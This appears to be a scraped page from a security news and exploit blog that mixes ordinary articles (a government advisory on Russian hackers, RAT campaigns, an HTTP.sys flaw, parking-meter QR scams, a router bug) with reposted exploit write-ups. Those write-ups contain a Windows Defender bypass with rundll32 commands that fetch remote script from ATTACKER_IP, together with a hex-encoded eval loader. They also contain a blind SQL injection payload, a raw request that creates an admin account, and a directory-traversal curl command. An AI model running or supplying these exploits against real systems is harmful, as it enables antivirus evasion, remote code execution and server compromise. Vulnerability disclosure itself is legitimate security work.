Saturday, January 18, 2025
Home Blog Page 59

FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure

1
fbi

Amid renewed tensions between the U.S. and Russia over Ukraine and Kazakhstan, American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.

To that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and exploiting known vulnerabilities to gain initial access to target networks.

The list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are “common but effective,” are below —

“Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,” the agencies said.

“The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments — including cloud environments — by using legitimate credentials.”

Russian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized SolarWinds Orion updates to breach the networks of U.S. government agencies.

To increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.

“Consider using a centralized patch management system,” the advisory reads. “For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.”

Other recommended best practices are as follows —

  • Implement robust log collection and retention
  • Require accounts to have strong passwords
  • Enable strong spam filters to prevent phishing emails from reaching end-users
  • Implement rigorous configuration management programs
  • Disable all unnecessary ports and protocols
  • Ensure OT hardware is in read-only mode

Why not read

Bookmark
Please login to bookmarkClose

Hackers Use Cloud Services to Distribute Nanocore, Netwire, and AsyncRAT Malware

0
security
security

Threat actors are actively incorporating public cloud services from Amazon and Microsoft into their malicious campaigns to deliver commodity remote access trojans (RATs) such as NanocoreNetwire, and AsyncRAT to siphon sensitive information from compromised systems.

The spear-phishing attacks, which commenced in October 2021, have primarily targeted entities located in the U.S., Canada, Italy, and Singapore, researchers from Cisco Talos said in a report shared with THN

Using existing infrastructure to facilitate intrusions is increasingly becoming part of an attacker’s playbook as it obviates the need to host their own servers, not to mention using it as a cloaking mechanism to evade detection by security solutions.

In recent months, collaboration and communication tools like Discord, Slack, and Telegram have found a place in many an infection chain to commandeer and exfiltrate data from the victim machines. Viewed in that light, the abuse of cloud platforms is a tactical extension that attackers could exploit as a first step into a vast array of networks.

“There are several interesting aspects to this particular campaign, and it points to some of the things we commonly see used and abused by malicious actors,” Nick Biasini, head of outreach at Cisco Talos, told The Hacker News via email.

“From the use of cloud infrastructure to host malware to the abuse of dynamic DNS for command-and-control (C2) activities. Additionally, the layers of obfuscation point to the current state of criminal cyber activities, where it takes lots of analysis to get down to the final payload and intentions of the attack.”

As with many of these types of campaigns, it all starts with an invoice-themed phishing email containing a ZIP file attachment that, when opened, triggers an attack sequence that downloads next-stage payloads hosted on an Azure Cloud-based Windows server or an AWS EC2 instance, ultimately culminating in the deployment of different RATs, including AsyncRAT, Nanocore, and Netwire.

Also noteworthy is the use of DuckDNS, a free dynamic DNS service, to create malicious subdomains to deliver malware, with some of the actor-controlled malicious subdomains resolving to the download server on Azure Cloud while other servers are operated as C2 for the RAT payloads.

“Malicious actors are opportunistic and will always be looking for new and inventive ways to both host malware and infect victims,” Biasini said. “The abuse of platforms such as Slack and Discord as well as the related cloud abuse are part of this pattern. We also commonly find compromised websites being used to host malware and other infrastructure as well and again points to the fact that these adversaries will use any and all means to compromise victims.”

We think you may enjoy reading, Steps to Hardening your VPS Security

Bookmark
Please login to bookmarkClose

MS: New Critical Windows HTTP Vulnerability Is Wormable

2
microsoft

Microsoft has patched a critical flaw tagged as wormable and found to impact the latest desktop and server Windows versions, including Windows 11 and Windows Server 2022.

The bug, tracked as CVE-2022-21907 and patched during this month’s Patch Tuesday, was discovered in the HTTP Protocol Stack (HTTP.sys) used as a protocol listener for processing HTTP requests by the Windows Internet Information Services (IIS) webserver.

Successful exploitation requires threat actors to send maliciously crafted packets to targeted Windows servers, which use the vulnerable HTTP Protocol Stack for processing packets.

microsoft worm

Microsoft recommends users prioritize patching this flaw on all affected servers since it could allow unauthenticated attackers to remotely execute arbitrary code in low complexity attacks and “in most situations,” without requiring user interaction.

Mitigation available (for some Windows versions)

Luckily, the flaw is not currently under active exploitation and there are no publicly disclosed proof of concept exploits.

Furthermore, on some Windows versions (i.e., Windows Server 2019 and Windows 10 version 1809), the HTTP Trailer Support feature containing the bug is not enabled by default.

According to Microsoft, the following Windows registry key has to be configured on these two Windows versions to introduce the vulnerability: 

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\ 

"EnableTrailerSupport"=dword:00000001

Disabling the HTTP Trailer Support feature will protect systems running the two versions, but this mitigation does not apply to other impacted Windows releases.

Potential targets likely safe from attacks

While home users are yet to apply today’s security updates, most companies will likely be protected from CVE-2022-21907 exploits, given that they don’t commonly run the latest released Windows versions.

In the last two years, Microsoft has patched several other wormable bugs, impacting the Windows DNS Server (also known as SIGRed), the Remote Desktop Services (RDS) platform (aka BlueKeep), and the Server Message Block v3 protocol (aka SMBGhost).

Redmond also addressed another Windows HTTP RCE vulnerability in May 2021 (tracked as CVE-2021-31166 and also tagged as wormable), for which security researchers released demo exploit code that could trigger blue screens of death.

However, threat actors are yet to exploit them to create wormable malware capable of spreading between vulnerable systems running vulnerable Windows software.

Read more CyberSecurity news articles

Bookmark
Please login to bookmarkClose

Microsoft Windows Defender – Detections Bypass

1
EXPLOIT
EXPLOIT

Advisory:

Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
Exploit Author: John Page (aka hyp3rlinx)
Website: hyp3rlinx.altervista[.]org
Source:  http://hyp3rlinx.altervista.[org]/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
twitter.[]com/hyp3rlinx
ISR: ApparitionSec

[Vendor]
www.microsoft[.]com


[Product]
Windows Defender

Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your
device and in the cloud.


[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A


[CVE Reference]
N/A


[Security Issue]
Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.

Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)

Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.

Full bypass E.g.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

Enter, Backdoor:JS/Relvelshe.A detection.

Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"

However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. 


[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426

[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.

python -m http.server 80

"hi.tmp"

<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>


2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")


BOOM!


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
January 10, 2022 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Return to exploits

Bookmark
Please login to bookmarkClose

Arbitrary Command Injection Affecting pipenv

0
vulnerability

pipenv is a Python Development Workflow for Humans.

Affected package, versions [2018.10.9, 2022.1.8)

How to fix?

Upgrade pipenv to version 2022.1.8 or higher.

Overview

Affected versions of this package are vulnerable to Arbitrary Command Injection. Due to a flaw in pipenv’s parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file (e.g. with pipenv install -r requirements.txt) to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims’ systems.

Arbitrary Command Injection Affecting pipenv
Snyk

According to the requirements file format specification, any lines which begin with a # character, and/or any text in a line following whitespace and a # character should be interpreted as a comment which will be ignored during the processing of the requirements file.

However, due to a flaw in pipenv’s parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file

Note: The primary hurdle to successful exploitation of this vulnerability depends on an attacker’s ability to surreptitiously insert a specially crafted string into a requirements.txt file that will be installed by a victim. This is not a highly likely scenario, however, it can be made easier to obfuscate due to it being hidden within comments.

References

Return to exploits

Bookmark
Please login to bookmarkClose

Online Railway Reservation System 1.0 – ‘id’ SQL Injection (Unauthenticated)

0
EXPLOIT
EXPLOIT
Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)
Exploit Author: twseptian
Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
Version: v1.0
Tested on: Kali Linux 2021.4,PHP 7.4.26

*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to it's database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'id' parameter on the Reservation Form.

*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

*Steps of reproduce:*
Step-1: Navigate to 'Schedule' > go to 'Book' or 'Revervation Form' page using the following URL: 
http://localhost/orrs/?page=reserve&sid=1

Step-2: Put the SQL Injection payloads in 'id' field.
In this we used time-based blind payload: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
Bookmark
Please login to bookmarkClose

Online Railway Reservation System 1.0 – Admin Account Creation (Unauthenticated)

0
EXPLOIT
EXPLOIT
Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
Exploit Author: Zachary Asher
Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
Version: 1.0
Tested on: Online Railway Reservation System 1.0

=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602

-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"

testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"

1
            
Copy
Tags:
Bookmark
Please login to bookmarkClose

CoreFTP Server build 725 – Directory Traversal (Authenticated)

0
EXPLOIT
EXPLOIT
 Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated)
 Exploit Author: LiamInfosec
 Vendor Homepage: http://coreftp.com/
 Version: build 725 and below
 Tested on: Windows 10
 CVE : CVE-2022-22836

# Description:

CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request.

# Proof of Concept:

curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops
            
Bookmark
Please login to bookmarkClose

US Police Warn of Parking Meters with Fake QR Codes

0
parking meter
parking meter

In a hurry to park your car?  Don’t want to fumble around in your pocket to find cash for the parking meter, and don’t have the correct payment app installed on your phone?

Well, think carefully before rushing to scan the payment QR code stuck on the side of the meter – it may well be an attempt by fraudsters to phish your financial information.

Police are warning that they have discovered bogus QR codes stuck onto public parking meters across Austin, Texas – a city where parking meters don’t display QR codes, and only accept payment via coins, cards or a smartphone app.

Twitter tweet from APD.
Twitter tweet from APD.

What happens if I scan the code?

The QR codes found by Austin police department directed unsuspecting users to a fraudulent website that would ask for payment details with the false promise that their parking session would be paid for.

The City of Austin checked its parking meters after being notified of a similar QR code scam by officials in San Antonio.  They had discovered over 100 parking meters similarly stickered in late December.

Lt Marcus Booth of San Antonio Police Department told reporters that the webpage pretended to accept payment for the parking session, but that money ended up in the hands of scammers rather than in the city’s coffers.

In short, it’s not just car drivers who are the victims of theft, but the city too.

It’s not known whether the attacks mounted against parking meters in the two cities are connected, or the work of copycats.  But clearly, it’s not a difficult scam for other groups to replicate in other American cities, or indeed elsewhere in the world.

As a consequence, you might be wiser paying for your parking meter with cash or via the appropriate smartphone app.

Authorities are encouraging anyone who believes that they might have been scammed by the fraudulent parking meter QR codes to file a police report and inform their payment card issuer immediately.

Meanwhile, if you see someone tampering with a parking meter, who is not a badged city employee, do the right thing and call the police.

Read more related cybersecurity articles

Bookmark
Please login to bookmarkClose

New KCodes NetUSB Bug Affects Millions of Routers from Different Vendors

0
router bug
router bug

Cybersecurity researchers have detailed a high severity flaw in KCodes NetUSB component that’s integrated into millions of end-user router devices from Netgear, TP-Link, Tenda, EDiMAX, D-Link, and Western Digital, among others.

KCodes NetUSB is a Linux kernel module that enables devices on a local network to provide USB-based services over IP. Printers, external hard drives, and flash drives plugged into a Linux-based embedded system (e.g., a router) are made available via the network using the driver.

CVE-2021-45608 (CVSS score: 9.8), as the security flaw is tracked as, relates to a buffer overflow vulnerability that, if successfully exploited, can allow attackers to execute code remotely in the kernel and perform malicious activities of their choice, according to a report shared by SentinelOne with THN.

This is the latest in a string of NetUSB vulnerabilities that has been patched in recent years. In May 2015, researchers from SEC Consult disclosed another buffer overflow flaw (CVE-2015-3036) that could result in a denial-of-service (DoS) or code execution.

kcodes strings

Then in June 2019, Cisco Talos divulged details of two weaknesses in NetUSB (CVE-2019-5016 and CVE-2019-5017) that could allow an attacker to inappropriately force select Netgear wireless routers into disclosing sensitive information and even giving the attacker the ability to remotely execute code.

Following responsible disclosure to KCodes on September 20, 2021, the Taiwanese company issued a patch to all vendors on November 19, after which Netgear released firmware updates containing fixes for the vulnerability.

SentinelOne has refrained from releasing a proof-of-concept (PoC) code in light of the fact that other vendors are still in the process of shipping updates. But the cybersecurity firm cautioned the possibility of an exploit emerging in the wild despite the technical complexity involved, making it imperative that users apply the fixes to mitigate any potential risk.

“Since this vulnerability is within a third-party component licensed to various router vendors, the only way to fix this is to update the firmware of your router, if an update is available,” researcher Max Van Amerongen said. “It is important to check that your router is not an end-of-life model as it is unlikely to receive an update for this vulnerability.”

source

We think you may enjoy reading,

Bookmark
Please login to bookmarkClose